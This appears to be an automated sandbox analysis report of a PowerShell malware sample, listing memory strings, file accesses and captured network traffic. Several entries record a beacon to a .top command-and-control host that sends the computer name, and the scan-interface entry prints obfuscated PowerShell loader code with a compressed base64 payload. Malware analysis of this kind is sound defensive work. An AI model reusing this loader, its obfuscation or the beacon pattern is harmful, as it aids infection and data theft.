Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.19711562814.0000012D47476000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?lib.pdbpdblib.pdbR source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.19713429136.0000012D474F2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdb% source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D4747A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.19714097677.0000012D47627000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 364e35\System.Management.Automation.pdb, source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb@ source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w |
Source: global traffic | HTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w |
Source: global traffic | HTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php? |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527p |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRG |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx "ePppNXh3aTRmbsmsPB58Ygry9hcikY33BxevfDfcnskAL6Q39D3/B3sTd8YCZm0aejr1HSrVwZ+PkfJYsp8ipMKv23NUSjJ5EJ48jhKiM2G32QPq0Y7vK+XpFkselIHAWM1f7EcJE02NBpNBmJG00LGOsLeR3afKvLracreoNahdEhvNi6+Xio7gmktdkafO1JbOG49gloxe0BDCFQYGzok6h1iFSYsQAOqMqs+sN35oALWRNy3vi1Te7Yq5kwXsPD2SA4CbE14PZ60wmkkEYrO1pk+rMvpUlc+HUCM05ufUm6BapcMMkMAOgo2qofksi7f+ChWQf3b7NOBiqJE4RrdWgSNflljCj0K+0ezEd2r4GVBLXAp2xrxIV8HL6nTxqlMK3EQaJ/G1x6oBMb9ufiUtRqWNEpp2+Hj8mJJ8dq6JX7kSkGmmr/L8Bx5cBiFErc8sbdmGJESYrVkKAwzchZq1XAsPkBZJlu6mOma4Fsucp5L2gpem+A94dys9slPN2LyuDjQZtkkVkVIhadCY6c3wOz8ZZrJ6vFuixQ1/BR/UPD++AthIo1M0/KSJqrkJsmmd9/KUkU3OH0aerj9cY3Rv8zh6E8Oi0veLrpvv/yrRvXkCwLezwPfZxgHmx1oMZ2zXA1Q0pOyrHeivFt9Q77uvHambP2RES7CPo+sEGjq/nxkeOdZ9Zq8RS1NXF4uN+r8HzaBoloy5EJvFurqqyMtMlozeVlVME466WreBBsTfo1rQrcwzKjM+M34u1AP9yhmkazf+xP5xTddfEpCV+HRbtHm6SrUGHk4aqTdRoBmtU3nassoxNnO7WMZ+8d9aR/ZZWit9F95f93eCN8sv7B2rR0dhXXd5pq8890mUi0mTGFksKxyAU7mZfMXE69NaxkgZqHhZ/ha0Ntzbnbl57d+OUE8p8g25Eb/WWsULGkabjp3Bj4OD4AaAitk5kZ7UMjEO04X8pOVtqcsYkE4OS0QNkcyX1ZHkkLayiLVh5kDLCJCxZJWp1xapi673/R0zvKyswm+MipMVWVNIgfcb51+A+q+buC776tnqt/wh0rGcWBv54dFC/0mS3Rm/wvZrNAHWBSQBsP6n1T+vYf5G+NTaJ40XK1Op60RZgX0wZF2UU3Yfm6MrjBl54BSS+9Qwx5W9qPh2KsaudLFZu6j08eIvABPQnyhykaVZToWJuplwqtnTJ01xrxVdhVVFamj8bXmpg7u67MWdv7/AqC6M6kQJkdqnp6nu2twA2IdJU |